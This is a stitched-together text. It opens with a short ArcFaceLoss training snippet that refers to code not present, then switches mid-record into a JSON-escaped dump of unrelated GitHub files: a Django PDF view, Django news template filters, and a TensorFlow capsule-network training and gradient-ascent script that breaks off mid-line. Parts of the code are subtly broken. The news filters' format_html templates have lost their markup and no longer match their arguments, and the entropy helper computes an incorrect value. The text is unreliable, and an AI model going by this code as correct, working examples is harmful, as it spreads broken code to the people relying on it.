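As the comment in the ResNet initializer above notes, pytorch-metric-learning's `ArcFaceLoss` carries its own learnable class-weight matrix, so it needs an optimizer of its own alongside the model's. A minimal sketch of one such step; the sizes, batch, and learning rate are hypothetical, and the model forward pass is stood in by a random embedding tensor:

```python
import torch
from pytorch_metric_learning import losses

embedding_size, num_classes = 128, 10                       # hypothetical sizes
criterion = losses.ArcFaceLoss(num_classes, embedding_size)
loss_optimizer = torch.optim.SGD(criterion.parameters(), lr=0.01)

embeddings = torch.randn(32, embedding_size, requires_grad=True)  # stand-in for model output
labels = torch.randint(0, num_classes, (32,))

loss = criterion(embeddings, labels)
loss_optimizer.zero_grad()
loss.backward()
loss_optimizer.step()     # in real training, step the model's optimizer here as well
print(loss.item())
```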
\"\"\"\n\n id_to_view = request.GET.get('id', None)\n\n # https://stackoverflow.com/questions/21925671/convert-django-model-object-to-dict-with-all-of-the-fields-intact\n\n instance = model_to_dict(ProgramModel.objects.get(id=int(id_to_view)))\n pretty_print_reqs(instance)\n pretty_print_rules(instance)\n\n subplans = SubplanModel.objects.all()\n\n context = {\n \"program\": instance,\n 'subplans': subplans\n }\n\n if \"raw\" in request.GET:\n return render(request, 'pdf_program.html', context=context)\n else:\n response = WeasyTemplateResponse(request=request, content_type='application/pdf',\n filename=instance[\"name\"] + \".pdf\", attachment=False,\n template=\"pdf_program.html\", context=context)\n\n return response.render()\n","repo_name":"cass-degrees/CASS-Degrees-Code","sub_path":"cassdegrees/ui/views/pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"41219947241","text":"from django import template\nfrom django.core.urlresolvers import reverse\nfrom django.db.models.query_utils import Q\nfrom django.utils.html import format_html\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom coffee.models import News\nfrom misc.models import get_public_group\n\nregister = template.Library()\n\n\ndef get_group_filter(user):\n if user.is_superuser:\n q = Q()\n elif user.is_authenticated():\n q = Q(target_groups__in=user.groups.all())\n else:\n q = Q(target_groups__in=[get_public_group().pk, ])\n return q\n\n\n@register.filter(name='has_news')\ndef has_news(user):\n return user is not None and get_news(user).exists()\n\n\n@register.filter(name='has_many_news')\ndef has_many_news(user):\n return user is not None and get_news(user).count() > 1\n\n\n@register.filter(name='get_news')\ndef get_news(user):\n return News.objects_active().filter(get_group_filter(user))\n\n\n@register.filter(name='get_news_with_count_range')\ndef get_news_with_count_range(user):\n i = 0\n for n in News.objects_active().filter(get_group_filter(user)):\n yield (i, n)\n i += 1\n\n\n@register.filter(name='get_news_count_range')\ndef get_news_count_range(user):\n return range(0, News.objects_active().filter(get_group_filter(user)).count())\n\n\n@register.filter(name='news_as_href')\ndef news_as_href(news):\n return format_html(\n '%s' %\n (\n reverse('misc:news_list'),\n news.pk,\n news_as_span(news),\n )\n )\n\n\n@register.filter(name='news_as_span')\ndef news_as_span(news):\n if news.title:\n return format_html(\n '%s %s%s' % (news.severity_str(), news.title, _(':'), news.body[:80]))\n else:\n return format_html('%s' % (news.severity_str(), news.body))\n\n\n@register.filter(name='news_as_div')\ndef news_as_div(news):\n # if news.title:\n return format_html(\n '' %\n {\n 'pk': news.pk,\n 'severity_str': news.severity_str(),\n 'news_list': reverse('misc:news_list'),\n 'included': reverse('misc:news', args=[news.pk]),\n 'as_html': news.as_html(),\n }\n )","repo_name":"jolorenzo/my_site","sub_path":"misc/templatetags/news_filters.py","file_name":"news_filters.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73160267345","text":"from __future__ import absolute_import, division, print_function\n\nimport os \nimport sys \nimport time \nimport re \nfrom glob import glob\nfrom pprint import pprint\nimport numpy as np \nimport tensorflow as tf \n\nfrom input_data.mnist import mnist_input, 
mnist_dream_inputs\nfrom input_data.fashion_mnist import fashion_mnist_input, fashion_mnist_dream_input\nfrom input_data.svhn import svhn_input, svhn_dream_input\nfrom input_data.cifar10 import cifar10_input, cifar10_dream_input\nfrom input_data.noise import noise_dream_input\n\nfrom models import cnn_model\nfrom models import capsule_model\n\nfrom grad import naive_max_norm, max_norm_diff, naive_max_caps_dim, max_caps_dim_diff, utils\n\nfrom config import FLAGS, default_hparams\n\nMODELS = {\n 'cnn': cnn_model.CNNModel,\n 'cap': capsule_model.CapsuleModel\n}\n\nINPUTS = {\n 'mnist': mnist_input,\n 'fashion_mnist': fashion_mnist_input,\n 'svhn': svhn_input,\n 'cifar10': cifar10_input\n}\n\nDREAM_INPUTS = {\n 'mnist': mnist_dream_inputs,\n 'fashion_mnist': fashion_mnist_dream_input,\n 'svhn': svhn_dream_input,\n 'cifar10': cifar10_dream_input\n}\n\nVIS_GRAD_COMPUTER = {\n 'naive_max_norm': naive_max_norm,\n 'max_norm_diff': max_norm_diff,\n 'naive_max_caps_dim': naive_max_caps_dim,\n 'max_caps_dim_diff': max_caps_dim_diff\n}\n\nMETHOD_TYPES = ['normal', 'ensemble']\n\nNORM_ASPECT_TYPES = ['naive_max_norm', 'max_norm_diff']\n\nDIRECTION_ASPECT_TYPES = ['naive_max_caps_dim', 'max_caps_dim_diff']\n\ndef _compute_entropy(arr):\n \"\"\"Given a numpy array compute the entropy of it\n Args:\n arr: a numpy array;\n Returns:\n entropy: scalar, the entropy of the given array;\n \"\"\"\n arr_sum = np.sum(arr)\n arr_exp = np.exp(arr)\n entropy = - np.dot(arr_exp/arr_sum, arr)\n return entropy\n\ndef get_distributed_dataset(total_batch_size, num_gpus,\n max_epochs, data_dir, dataset, image_size,\n split='default', n_repeats=None):\n \"\"\"Reads the input data using 'input_data' functions.\n\n For 'train' and 'test' splits,\n given {num_gpus} GPUs and {total_batch_size}, we distribute\n those {total_batch_size} into {num_gpus} partitions,\n denoted as {batch_size}.\n\n For 'noise' and 'dream' splits,\n check if {total_batch_size} ≡ 1, otherwise raise 'ValueError'.\n In this case, we will duplicate every example {num_gpus} times \n so that when we pass the examples into multi-tower models, it is \n calculating and averaging the gradients of the same images.\n\n Args:\n total_batch_size: total number of data entries over all towers;\n num_gpus: number of GPUs available to use;\n max_epochs: for 'train' split, this parameter decides the number of \n epochs to train for the model; for 'test' split, this parameter\n should ≡ 1.\n data_dir: the directory containing the data;\n dataset: the name of the dataset;\n image_size: image size after cropping;\n split: 'train', 'test', 'noise', 'dream';\n n_repeats ('noise' and 'dream'): the number of repeats of the same image.\n Returns:\n batched_dataset: dataset object;\n specs: dataset specifications.\n \"\"\"\n assert dataset in ['mnist', 'fashion_mnist', 'svhn', 'cifar10']\n with tf.device('/gpu:0'):\n if split in ['train', 'test']:\n assert total_batch_size % num_gpus == 0\n distributed_dataset, specs = INPUTS[dataset].inputs(\n total_batch_size, num_gpus, max_epochs, image_size, \n data_dir, split)\n return distributed_dataset, specs\n elif split == 'noise':\n batched_dataset, specs = noise_dream_input.inputs(\n 'noise', 1, max_epochs, n_repeats, image_size)\n return batched_dataset, specs\n elif split == 'dream':\n batched_dataset, specs = DREAM_INPUTS[dataset].inputs(\n 'train', data_dir, max_epochs, n_repeats, image_size)\n return batched_dataset, specs\n else:\n raise ValueError()\n\ndef find_event_file_path(load_dir):\n \"\"\"Finds the event file.\n\n 
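The `_compute_entropy` helper above mixes `np.exp(arr)` with the sum of the *raw* array, so the result is not the entropy of a normalized distribution. A conventional softmax-entropy sketch, which is my reading of the intent rather than necessarily the authors':

```python
import numpy as np

def softmax_entropy(arr):
    p = np.exp(arr - np.max(arr))        # subtract the max for numerical stability
    p /= p.sum()                         # normalize into a proper distribution
    return -np.sum(p * np.log(p + 1e-12))

print(softmax_entropy(np.array([0.1, 0.1, 0.8])))   # flatter inputs give larger entropy
```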
Args:\n load_dir: the directory to look for the training checkpoints.\n Returns:\n path to the event file.\n \"\"\"\n fpath_list = glob(os.path.join(load_dir, 'events.*'))\n if len(fpath_list) == 1:\n return fpath_list[0]\n else:\n raise ValueError\n\ndef find_latest_checkpoint_info(load_dir, find_all=False):\n \"\"\"Finds the latest checkpoint information.\n\n Args:\n load_dir: the directory to look for the training checkpoints.\n Returns:\n latest global step, latest checkpoint path, step_ckpt pair list\n \"\"\"\n ckpt = tf.train.get_checkpoint_state(load_dir)\n if ckpt and ckpt.model_checkpoint_path:\n latest_step = extract_step(ckpt.model_checkpoint_path)\n if find_all == True:\n ckpt_paths = glob(os.path.join(load_dir, 'model.ckpt-*.index'))\n pairs = [(int(re.search('\\d+', os.path.basename(path)).group(0)), \n os.path.join(os.path.dirname(path), os.path.basename(path)[:-6]))\n for path in ckpt_paths]\n pairs = sorted(pairs, key=lambda pair: pair[0])\n else:\n pairs = []\n return latest_step, ckpt.model_checkpoint_path, pairs\n return -1, None, []\n\ndef extract_step(path):\n \"\"\"Returns the step from the file format name of Tensorflow checkpoints.\n\n Args:\n path: The checkpoint path returned by tf.train.get_checkpoint_state.\n The format is: {ckpnt_name}-{step}\n Returns:\n The last training step number of the checkpoint.\n \"\"\"\n file_name = os.path.basename(path)\n return int(file_name.split('-')[-1])\n\ndef _write_specs_file(write_dir, aspect_type, dataset, total_batch_size, \n max_epochs, iter_n, step, threshold):\n write_dir = os.path.join(write_dir, 'max_ep{}-iter_n{}-step{}-th{}'.format(\n max_epochs, iter_n, step, threshold))\n if not os.path.exists(write_dir):\n os.makedirs(write_dir)\n with open(os.path.join(write_dir, 'specs.txt'), 'w+') as f:\n f.write('explore type: {};\\n'.format(aspect_type))\n f.write('dataset: {};\\n'.format(dataset))\n f.write('total_batch_size: {};\\n'.format(total_batch_size))\n f.write('max_epochs: {};\\n'.format(max_epochs))\n f.write('iter_n: {};\\n'.format(iter_n))\n f.write('step: {};\\n'.format(step))\n f.write('threshold: {};\\n'.format(threshold))\n return write_dir\n\ndef run_train_session(iterator, specs, \n summary_dir, max_epochs,\n joined_result, save_epochs):\n \"\"\"Starts a session, train the model, write summary into an event file,\n and save the whole graph one time and variable every {save_epochs} epochs.\n \n Args:\n iterator: dataset iterator;\n specs: dict, dataset specifications;\n summary_dir: str, directory to store ckpts;\n joined_result: namedtuple, TowerResult('inferred', 'train_op',\n 'summary', 'correct', 'accuracy');\n save_epochs: scalar, how often to save the data.\n \"\"\"\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # declare summary writer and save the graph in the meanwhile\n writer = tf.summary.FileWriter(summary_dir, sess.graph)\n # declar batched data instance and initialize the iterator\n batch_data = iterator.get_next()\n sess.run(iterator.initializer)\n # initialize variables\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n sess.run(init_op)\n # declare saver object for future saving\n saver = tf.train.Saver(max_to_keep=None)\n\n epoch_time = 0\n total_time = 0\n step_counter = 0\n epochs_done = 0\n # restore ckpt if not restart\n latest_step, latest_checkpoint_fpath, _ = find_latest_checkpoint_info(summary_dir, False)\n if latest_step != -1 and latest_checkpoint_fpath != None:\n saver.restore(sess, 
latest_checkpoint_fpath)\n step_counter = latest_step\n epochs_done = step_counter // specs['steps_per_epoch']\n total_steps = specs['steps_per_epoch'] * (max_epochs - epochs_done)\n\n # start feeding process\n for _ in range(total_steps):\n start_anchor = time.time() # time anchor\n step_counter += 1\n\n try:\n # get placeholders and create feed_dict\n feed_dict = {} \n for i in range(specs['num_gpus']):\n batch_val = sess.run(batch_data)\n feed_dict[tf.get_collection('tower_%d_batched_images' % i)[0]] = batch_val['images']\n feed_dict[tf.get_collection('tower_%d_batched_labels' % i)[0]] = batch_val['labels']\n \n \"\"\"Run inferences\"\"\"\n summary, accuracy, _ = sess.run(\n [joined_result.summary, joined_result.accuracy, joined_result.train_op],\n feed_dict=feed_dict)\n \"\"\"Add summary\"\"\"\n writer.add_summary(summary, global_step=step_counter)\n # calculate time\n time_consuming = time.time() - start_anchor\n epoch_time += time_consuming\n total_time += time_consuming\n \"\"\"Save ckpts\"\"\"\n if step_counter % (specs['steps_per_epoch'] * save_epochs) == 0:\n ckpt_path = saver.save(\n sess, os.path.join(summary_dir, 'model.ckpt'),\n global_step=step_counter)\n print(\"{0} epochs done (step = {1}), accuracy {2:.4f}. {3:.2f}s, checkpoint saved at {4}\".format(\n step_counter // specs['steps_per_epoch'], \n step_counter, \n accuracy, \n epoch_time, \n ckpt_path))\n epoch_time = 0\n elif step_counter % specs['steps_per_epoch'] == 0:\n print(\"{0} epochs done (step = {1}), accuracy {2:.4f}. {3:.2f}s\".format(\n step_counter // specs['steps_per_epoch'], \n step_counter, \n accuracy, \n epoch_time))\n epoch_time = 0\n else:\n print(\"running {0} epochs {1:.1f}%, total time ~ {2}:{3}:{4}\".format(\n step_counter // specs['steps_per_epoch'] + 1,\n step_counter % specs['steps_per_epoch'] * 100.0 / specs['steps_per_epoch'],\n int(total_time // 3600), \n int(total_time % 3600 // 60), \n int(total_time % 60)),\n end='\\r')\n except tf.errors.OutOfRangeError:\n break\n # Finished one step\n print('total time: {0}:{1}:{2}, accuracy: {3:.4f}.'.format(\n int(total_time // 3600), \n int(total_time % 3600 // 60), \n int(total_time % 60),\n accuracy))\n\ndef train(hparams, num_gpus, data_dir, dataset, model_type, total_batch_size, image_size,\n summary_dir, save_epochs, max_epochs):\n \"\"\"Trains a model.\n\n It will initialize the model with either previously a saved model ckpt in\n the {summary_dir} directory or start from scratch if the directory is empty.\n The training is distributed on {num_gpus} GPUs. 
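A quick check of the resume bookkeeping used in `run_train_session` above: the global step restored from the newest checkpoint determines how many epochs are already done and how many steps remain. The numbers here are hypothetical:

```python
steps_per_epoch, max_epochs = 500, 10
latest_step = 1750                       # as restored from the newest checkpoint
epochs_done = latest_step // steps_per_epoch
total_steps = steps_per_epoch * (max_epochs - epochs_done)
print(epochs_done, total_steps)          # -> 3 3500
```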
It writes a summary at \n every step and saves the model every {save_epochs} epochs.\n\n Args:\n hparams: the hyperparameters to build the model graph;\n num_gpus: number of GPUs to use;\n data_dir: the directory containing the input data;\n dataset: the name of the dataset for the experiment;\n model_type: the name of model architecture;\n total_batch_size: total batch size, which will be distributed to {num_gpus} GPUs;\n image_size: image size after cropping/resizing;\n summary_dir: the directory to write summaries and save the model;\n save_epochs: how often the training model should be saved;\n max_epochs: maximum epochs to train.\n \"\"\"\n # define subfolder in {summary_dir}\n summary_dir = os.path.join(summary_dir, 'train')\n # define model graph\n with tf.Graph().as_default():\n # get batched dataset and declare initializable iterator\n distributed_dataset, specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n 'train')\n iterator = distributed_dataset.make_initializable_iterator()\n # initialize model with hparams and specs\n model = MODELS[model_type](hparams, specs)\n # build a model on multiple gpus and returns a tuple of \n # (a list of input tensor placeholders, a list of output tensor placeholders)\n joined_result = model.build_model_on_multi_gpus()\n\n \"\"\"Print stats\"\"\"\n param_stats = tf.contrib.tfprof.model_analyzer.print_model_analysis(\n tf.get_default_graph(),\n tfprof_options=tf.contrib.tfprof.model_analyzer.TRAINABLE_VARS_PARAMS_STAT_OPTIONS)\n sys.stdout.write('total_params: %d\\n' % param_stats.total_parameters)\n \"\"\"\"\"\"\n\n run_train_session(iterator, specs, \n summary_dir, max_epochs,\n joined_result, save_epochs)\n\ndef run_evaluate_session(iterator, specs, load_dir, summary_dir, kind, \n model_type, threshold):\n \"\"\"Find available ckpts and iteratively load the graph and variables.\n\n Args:\n iterator: dataset iterator;\n specs: dict, dataset specifications;\n load_dir: str, directory to load graph;\n summary_dir: str, directory to store ckpts;\n kind: 'train' or 'test';\n model_type: 'cnn' or 'cap';\n threhold: if {model_type}='cnn', then it should be None; \n else, it is threshold to filter capsules;\n \"\"\"\n # create summary folder if not exists\n if not os.path.exists(summary_dir):\n os.makedirs(summary_dir)\n\n \"\"\"Load available ckpts\"\"\"\n # find latest step, ckpt, and all step-ckpt pairs\n latest_step, latest_ckpt_path, all_step_ckpt_pairs = find_latest_checkpoint_info(load_dir, True)\n if latest_step == -1 or latest_ckpt_path == None:\n raise ValueError('{0}\\n ckpt files not fould!\\n {0}'.format('='*20))\n else:\n print('{0}\\nFound a ckpt!\\n{0}'.format('='*20))\n latest_ckpt_meta_path = latest_ckpt_path + '.meta'\n\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # import compute graph\n saver = tf.train.import_meta_graph(latest_ckpt_meta_path)\n # get dataset object working\n batch_data = iterator.get_next()\n\n acc_t = tf.get_collection('accuracy')[0]\n step_mean_acc_pairs = []\n\n # iteratively restore variables and run evaluations\n for idx, (step, ckptpath) in enumerate(all_step_ckpt_pairs):\n # restore variables\n saver.restore(sess, ckptpath)\n\n sess.run(iterator.initializer)\n accs = []\n\n while True:\n try: \n # get placeholders and create feed dict\n feed_dict = {}\n for i in range(specs['num_gpus']):\n batch_val = sess.run(batch_data)\n feed_dict[tf.get_collection('tower_%d_batched_images' % i)[0]] = batch_val['images']\n 
feed_dict[tf.get_collection('tower_%d_batched_labels' % i)[0]] = batch_val['labels']\n\n acc = sess.run(acc_t, feed_dict=feed_dict)\n accs.append(acc)\n except tf.errors.OutOfRangeError:\n break\n mean_acc = sum(accs) / len(accs)\n step_mean_acc_pairs.append((step, mean_acc))\n \n print('step: {0}, accuracy = {1:.4f} ~ {2} / {3}'.format(step, mean_acc, idx+1, len(all_step_ckpt_pairs)))\n with open(os.path.join(summary_dir, '%s_history.txt') % kind, 'w+') as f:\n for step, mean_acc in step_mean_acc_pairs:\n f.write('{}, {}\\n'.format(step, mean_acc))\n\ndef evaluate(num_gpus, data_dir, dataset, model_type, total_batch_size, image_size,\n threshold, summary_dir, max_epochs):\n \"\"\"Iteratively restore the graph and variables, and return the data to train and test curve.\n \n Args:\n num_gpus: number of GPUs to use;\n data_dir: the directory containing the input data;\n dataset: the name of the dataset for the experiment;\n model_type: the name of model architecture;\n total_batch_size: total batch size, which will be distributed to {num_gpus} GPUs;\n image_size: image size after cropping/resizing;\n threshold: threshold to filter out the target capsule effect;\n summary_dir: the directory to write summaries and save the model;\n max_epochs: maximum epochs to evaluate, ≡ 1.\n \"\"\"\n # define subfolder to load ckpt and write related files\n load_dir = os.path.join(summary_dir, 'train')\n summary_dir = os.path.join(summary_dir, 'evaluate')\n # declare an empty model graph\n with tf.Graph().as_default():\n # get train batched dataset and declare initializable iterator\n train_distributed_dataset, train_specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n 'train')\n train_iterator = train_distributed_dataset.make_initializable_iterator()\n # call evaluate experiment\n run_evaluate_session(train_iterator, train_specs, load_dir, summary_dir, 'train', \n model_type, threshold)\n with tf.Graph().as_default():\n # get test batched dataset and delcare initializable iterator\n test_distributed_dataset, test_specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n 'test')\n test_iterator = test_distributed_dataset.make_initializable_iterator()\n # call evaluate experiment\n run_evaluate_session(test_iterator, test_specs, load_dir, summary_dir, 'test', \n model_type, threshold)\n\ndef run_test_session(iterator, specs, load_dir):\n \"\"\"Load available ckpts\"\"\"\n latest_step, latest_ckpt_path, _ = find_latest_checkpoint_info(load_dir, False)\n if latest_step == -1 or latest_ckpt_path == None:\n raise ValueError('{0}\\n ckpt files not found!\\n {0}'.format('='*20))\n else:\n print('{0}\\nFound a ckpt!\\n{0}'.format('='*20))\n latest_ckpt_meta_path = latest_ckpt_path + '.meta'\n\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # import compute graph\n saver = tf.train.import_meta_graph(latest_ckpt_meta_path)\n # get dataset object working\n batch_data = iterator.get_next()\n\n acc_t = tf.get_collection('accuracy')[0]\n \n # restore variables \n saver.restore(sess, latest_ckpt_path)\n sess.run(iterator.initializer)\n\n accs = []\n while True:\n try:\n feed_dict = {}\n for i in range(specs['num_gpus']):\n batch_val = sess.run(batch_data)\n feed_dict[tf.get_collection('tower_%d_batched_images' % i)[0]] = batch_val['images']\n feed_dict[tf.get_collection('tower_%d_batched_labels' % i)[0]] = batch_val['labels']\n acc = sess.run(acc_t, feed_dict=feed_dict)\n 
accs.append(acc)\n except tf.errors.OutOfRangeError:\n break\n print(accs)\n mean_acc = np.mean(accs)\n print(mean_acc)\n\ndef test(split, num_gpus, data_dir, dataset, total_batch_size, image_size, summary_dir, max_epochs):\n # define subfolder to load ckpt\n load_dir = os.path.join(summary_dir, 'train')\n # declare an empty model graph\n with tf.Graph().as_default():\n # get train batched dataset and declare initializable iterator\n distributed_dataset, specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n split)\n iterator = distributed_dataset.make_initializable_iterator()\n # call test experiment\n run_test_session(iterator, specs, load_dir)\n\ndef run_norm_aspect(num_gpus, total_batch_size, max_epochs, data_dir, dataset, image_size,\n iter_n, step, threshold,\n load_dir, summary_dir, aspect_type):\n \"\"\"Run norm aspect exploration. Producing results to summary_dir.\n \n Args:\n num_gpus: number of GPUs available to use;\n total_batch_size: total batch size, ≡ 1;\n max_epochs: maximum epochs to train;\n data_dir: the directory containing the input data;\n dataset: the name of the dataset for the experiments;\n image_size: image size after cropping or resizing;\n iter_n: number of iterations to add gradients to original image;\n step: step size of each iteration of gradient ascent to mutliply;\n threshold: any gradients less than this value will not be added to the original image;\n load_dir: the directory to load files;\n summary_dir: the directory to write files;\n aspect_type: 'naive_max_norm' or 'max_norm_diff'.\n \"\"\"\n # wrtie specs file \n write_dir = _write_specs_file(summary_dir, aspect_type, dataset, total_batch_size,\n max_epochs, iter_n, step, threshold)\n # find out whether to feed in noise or normal images\n if 'noise_' in aspect_type:\n aspect_type = aspect_type[6:]\n split = 'noise'\n else:\n split = 'dream'\n\n # find latest ckpt information\n latest_step, latest_ckpt_path, _ = find_latest_checkpoint_info(load_dir)\n if latest_step == -1 or latest_ckpt_path == None:\n raise ValueError('{0}\\nckpt files not found!\\n{0}'.format('='*20))\n else:\n latest_ckpt_meta_path = latest_ckpt_path + '.meta'\n \n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # import compute graph and restore variables \n saver = tf.train.import_meta_graph(latest_ckpt_meta_path)\n saver.restore(sess, latest_ckpt_path)\n\n # compute the gradients\n result_grads, batched_images, caps_norms_tensor = VIS_GRAD_COMPUTER[aspect_type].compute_grads(0)\n n_repeats = len(result_grads)\n print('Number of gradients computed (= n_repeats = number of batches per epoch): ',\n n_repeats)\n \n batched_labels_t = tf.get_collection('tower_%d_batched_labels' % 0)[0]\n\n # get batched dataset and specs\n batched_dataset, specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n split=split, n_repeats=n_repeats)\n iterator = batched_dataset.make_initializable_iterator()\n batch_data = iterator.get_next()\n sess.run(iterator.initializer)\n\n if split == 'noise':\n num_class_loop = 1\n else:\n num_class_loop = specs['num_classes'] \n for i in range(max_epochs):\n for j in range(num_class_loop):\n for k in range(n_repeats):\n try:\n # get batched values\n batch_val = sess.run(batch_data)\n\n # run gradient ascent {iter_n} iterations with {step} step size\n # and threshold to get gradient ascended stacked image tensor\n # (iter_n, 1, 24, 24) and (iter_n, 3, 24, 24)\n img0 = 
batch_val['images']\n iter_n_recorded, ga_img_list = utils.run_gradient_ascent(\n result_grads[k], img0, batched_images, sess, iter_n, step, threshold)\n \n pred_class_prob_list = [] # list of probabilities of classes\n pred_class_entropy_list = [] # list of probabilities of prediction entropies\n for img in ga_img_list:\n pred = sess.run(caps_norms_tensor, feed_dict={batched_images: img}) # (1, 10)\n pred = np.reshape(pred, -1) # (10,)\n pred_cl = np.argmax(pred) # ()\n\n entropy = _compute_entropy(pred)\n \n # winning capsule mask\n win_cap_mask = np.array([0.0 for _ in range(10)])\n win_cap_mask[pred_cl] = 1.0\n win_cap_mask = np.expand_dims(win_cap_mask, axis=0)\n # all capsules mask\n all_cap_mask = np.expand_dims(np.array([1.0 for _ in range(10)]), axis=0)\n\n pred_class_prob_list.append(pred) # [(10,), (10,), ...]\n pred_class_entropy_list.append(entropy)\n\n ga_iter_matr = np.array(iter_n_recorded)\n ga_img_matr = np.stack(ga_img_list, axis=0)\n pred_class_prob_matr = np.stack(pred_class_prob_list)\n pred_class_entropy_matr = np.stack(pred_class_entropy_list, axis=0)\n\n # save to npz file\n npzfname = 'instance_{}-lbl0_{}-lbl1_{}.npz'.format(i, j, k)\n npzfname = os.path.join(write_dir, npzfname)\n np.savez(npzfname, iters=ga_iter_matr, images=ga_img_matr, pred=pred_class_prob_matr, \n pred_entropy=pred_class_entropy_matr)\n\n print('{0} {1} total:class:gradient = {2:.1f}% ~ {3:.1f}% ~ {4:.1f}%'.format(\n ' '*5, '-'*5, \n 100.0*(i * num_class_loop * n_repeats + j * n_repeats + k + 1) / (max_epochs * num_class_loop * n_repeats),\n 100.0*(j * n_repeats + k + 1)/(num_class_loop * n_repeats),\n 100.0*(k + 1)/n_repeats), end='\\r')\n except tf.errors.OutOfRangeError:\n break\n print()\n\ndef explore_norm_aspect(num_gpus, data_dir, dataset, image_size,\n total_batch_size, summary_dir, max_epochs,\n iter_n, step, threshold,\n aspect_type):\n \"\"\"Run gradient ascent on given images.\n \n Args:\n num_gpus: number of GPUs available to use;\n data_dir: the directory containing the input data;\n dataset: dataset name;\n image_size: image size after cropping or resizing;\n total_batch_size: total batch size, ≡ 1;\n summary_dir: the directory to write files;\n max_epochs: numbers of instance to use;\n iter_n: number of iterations to add gradients to original images;\n step: step size of each iteration of gradient ascent;\n threshold: any gradients less than this value will not be added to the original images;\n aspect_type: 'naive_max_norm', 'max_norm_diff', or 'noise_naive_max_norm', 'noise_max_norm_diff'.\n \"\"\"\n # define load_dir and summary_dir\n load_dir = os.path.join(summary_dir, 'train')\n summary_dir = os.path.join(summary_dir, aspect_type)\n # declare an empty model graph\n with tf.Graph().as_default():\n # call run_norm_aspect\n run_norm_aspect(num_gpus, total_batch_size, max_epochs, data_dir, dataset, image_size,\n iter_n, step, threshold,\n load_dir, summary_dir, aspect_type)\n\ndef run_direction_aspect(num_gpus, total_batch_size, max_epochs, data_dir, dataset, image_size,\n iter_n, step, threshold,\n load_dir, summary_dir, aspect_type):\n \"\"\"Run direction aspect exploration. Producing results to summary_dir.\n\n Args:\n num_gpus: number of GPUs available to use;\n total_batch_size: total batch size. 
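`run_norm_aspect` above delegates the actual image updates to `utils.run_gradient_ascent`, whose source is not shown here. A generic sketch of what such a loop typically looks like, given the `iter_n`, `step`, and `threshold` parameters it receives; `grad_fn` and the gradient normalization are assumptions for illustration, not the project's implementation:

```python
import numpy as np

def gradient_ascent(grad_fn, img, iter_n=20, step=1.0, threshold=0.0):
    snapshots = []
    for _ in range(iter_n):
        g = grad_fn(img)
        g[np.abs(g) < threshold] = 0.0   # suppress gradients below the threshold
        img = img + step * g / (np.abs(g).mean() + 1e-8)
        snapshots.append(img.copy())
    return snapshots

imgs = gradient_ascent(lambda x: 1.0 - x, np.zeros((1, 4, 4)), iter_n=3)
print(len(imgs), imgs[-1].shape)         # -> 3 (1, 4, 4)
```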
≡ 1;\n max_epochs: number of instance to produce;\n data_dir: the directory containing the input data;\n dataset: dataset name;\n image_size: image size after cropping or resizing;\n iter_n: number of iterations to add gradients to original images;\n step: step size of each iteration of gradient ascent to multiply;\n threshold: any gradients less than this value will not be added to original images;\n load_dir: the directory to load files;\n summary_dir: the directory to write files;\n aspect_type: 'naive_max_caps_dim', 'max_caps_dim_diff', or 'noise_naive_max_caps_dim', 'max_caps_dim_diff'.\n \"\"\"\n # Write specs file\n write_dir = _write_specs_file(summary_dir, aspect_type, dataset, total_batch_size,\n max_epochs, iter_n, step, threshold)\n \n # Find out to feed in noise of data\n if 'noise_' in aspect_type:\n aspect_type = aspect_type[6:]\n split = 'noise'\n else:\n split = 'dream'\n\n # Find latest checkpoint information\n latest_step, latest_ckpt_path, _ = find_latest_checkpoint_info(load_dir)\n if latest_step == -1 or latest_ckpt_path == None:\n raise ValueError('Checkpoint files not found!')\n else:\n latest_ckpt_meta_path = latest_ckpt_path + '.meta'\n\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # Import compute graph and restore variables\n saver = tf.train.import_meta_graph(latest_ckpt_meta_path)\n saver.restore(sess, latest_ckpt_path)\n\n # Compute the gradients\n result_grads, batched_images, caps_norms_tensor= VIS_GRAD_COMPUTER[aspect_type].compute_grads(0)\n n_repeats = 16 # 16 dimensional vector\n print('Number of gradients computed: ', len(result_grads))\n\n batched_labels_t = tf.get_collection('tower_%d_batched_labels' % 0)[0]\n\n # Get batched dataset and specs\n batched_dataset, specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs, \n data_dir, dataset, image_size,\n split=split, n_repeats=n_repeats)\n iterator = batched_dataset.make_initializable_iterator()\n batch_data = iterator.get_next()\n sess.run(iterator.initializer)\n\n # Suppose now we feed in image with lbl0 = '0',\n # and only run experiment on maximizing one specific \n # dimension of capsule '0'.\n num_class_loop = specs['num_classes'] \n for i in range(max_epochs): # instance number \n for j in range(num_class_loop): # j is the index of the target label capsule\n for k in range(n_repeats): # 16 dimensional wise loop\n try:\n # Get batched values\n batch_val = sess.run(batch_data)\n\n # Run gradient ascent {iter_n} iterations with step_size={step}\n # and threshold to get gradient ascended stacked image tensor\n # (iter_n, 1, 24, 24) and (iter_n, 3, 24, 24)\n img0 = batch_val['images']\n iter_n_recorded, ga_img_list = utils.run_gradient_ascent(\n result_grads[j*num_class_loop+k], img0, batched_images, sess, iter_n, step, threshold)\n \n pred_class_prob_list = [] # list of (predicted_class, probabilities of predicted class)s\n pred_class_entropy_list = []\n\n for img in ga_img_list:\n pred = sess.run(caps_norms_tensor, feed_dict={batched_images: img}) # (1, 10)\n pred = np.reshape(pred, -1) # (10,)\n pred_cl = np.argmax(pred) # 